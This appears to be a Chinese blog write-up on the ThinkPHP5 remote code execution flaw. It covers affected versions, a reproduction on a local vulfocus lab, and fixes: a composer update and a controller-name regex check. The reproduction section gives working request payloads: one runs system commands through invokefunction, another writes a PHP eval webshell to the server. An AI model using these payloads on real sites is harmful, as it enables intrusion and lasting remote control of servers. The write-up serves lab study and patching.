一、漏洞描述

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

二、影响产品

版本名 是否可被攻击 攻击条件
5.0.0 否 无
5.0.1 否 无
5.0.2 否 无
5.0.3 否 无
5.0.4 否 无
5.0.5 否 无
5.0.6 否 无
5.0.7 否 无
5.0.8 是 无需开启debug
5.0.9 是 无需开启debug
5.0.10 是 无需开启debug
5.0.11 是 无需开启debug
5.0.12 是 无需开启debug
5.0.13 是 需开启debug
5.0.14 是 需开启debug
5.0.15 是 需开启debug
5.0.16 是 需开启debug
5.0.17 是 需开启debug
5.0.18 是 需开启debug
5.0.19 是 需开启debug
5.0.20 否 无
5.0.21 是 需开启debug
5.0.22 是 需开启debug
5.0.23 是 需开启debug

5.0.13~5.0.19和5.0.21~5.0.23的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。
靶场环境
简单测试了下,发现该靶场的thinkphp版本是:ThinkPHP V5.1.30
截屏2022-03-31 下午10.13.16.png

这里为了更好的去做一些详细的测试,我在本地通过docker搭建了vulfocus,因为在线的vulfocus时间太短了,如果去做一些测试是没有办法实现的。

3.漏洞复现

打开靶场环境,直接构造payload:

?s=index/\think\app/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=ls /tmp


同样我们用whoami或者pwd也可以证明漏洞复现成功,这里上传一句话木马用蚁剑连接也是可以的。

?s=index/\think\template\driver\file/write
&cacheFile=shell.php
&content=%3C
?php%20@eval($_POST[pass])
?%3E

4.Python代码编写POC实现:

5.修复意见

使用composer安装,并且一直保持最新版本使用的话,使用下面的指令更新到最新版本即可

composer update topthink/framework

5.0版本
在thinkApp类的module方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

5.1版本
在thinkroutedispatchUrl类的parseUrl方法,解析控制器后加上

if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
最后修改:2022 年 04 月 09 日 10 : 53 PM
如果觉得这篇文章不错,不妨赏我碎银几两。